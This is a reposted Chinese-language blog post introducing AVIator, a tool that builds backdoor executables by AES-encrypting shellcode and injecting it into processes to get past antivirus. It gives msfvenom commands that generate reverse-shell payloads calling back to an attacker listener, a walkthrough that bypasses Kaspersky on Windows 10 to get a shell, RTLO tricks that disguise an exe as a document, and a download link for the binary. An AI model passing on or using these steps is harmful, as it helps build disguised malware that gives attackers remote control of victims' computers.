[转载] AVIator：使用加密和注入技术来绕过AV检测

admin

Ator是一个后门生成器实用程序，它使用加密和注入技术来绕过AV检测。进一步来说：

它使用AES加密来加密给定的shellcode
生成包含加密有效负载的可执行文件
使用各种注入技术将shellcode解密并注入目标系统
[ 进程注入 ]：

便携式可执行注入，包括将恶意代码直接写入进程（没有磁盘上的文件），然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化，例如反射DLL注入（将自映射DLL写入进程）和内存模块（写入进程时映射DLL）克服了地址重定位问题。
线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似，必须首先暂停该线程。
用法

该应用程序有一个由三个主要输入组成的表单（见下面的截图）：

AVIator：使用加密和注入技术来绕过AV检测 3/71-ChaBug安全
包含用于加密shellcode的加密密钥的文本
包含用于AES加密的IV的文本
包含shellcode的文本
重要提示：shellcode应作为C＃字节数组提供。

默认值包含执行notepad.exe（32位）的shellcode。提供此演示作为代码应如何形成的指示（使用msfvenom，可以使用-f csharp开关轻松完成，例如msfvenom -p windows / meterpreter / reverse_tcp LHOST = XXXX LPORT = XXXX -f csharp）。

在填充提供的输入并选择输出路径之后，根据所选择的选项生成可执行文件。

RTLO选项

简单来说，欺骗可执行文件看起来像“无辜”扩展，如'pdf'，'txt'等。例如文件“testcod.exe”将被解释为“tesexe.doc”

请注意，某些AV会将恶搞作为恶意软件提醒自己。

设置自定义图标

我想你们都知道它是什么:)

在Win 10 x64主机上绕过卡巴斯基AV（TEST CASE）

在运行完全更新的卡巴斯基AV的Windows 10机器中获取shell

目标机器：Windows 10 x64

使用msfvenom创建有效负载
[pre]
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
[/pre]
使用AVIator进行以下设置
目标OS体系结构：x64

注入技术：线程劫持（Shellcode Arch：x64，OS arch：x64）

目标程序：资源管理器（保留默认值）

在攻击者计算机上设置侦听器
在受害计算机上运行生成的exe
安装

Windows：

编译项目或从以下文件夹下载allready编译的可执行文件：

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux：

根据您的Linux发行版安装Mono，下载并运行二进制文件

例如在kali：

[pre]
root@kali# apt install mono-devel
root@kali# mono aviator.exe
[/pre]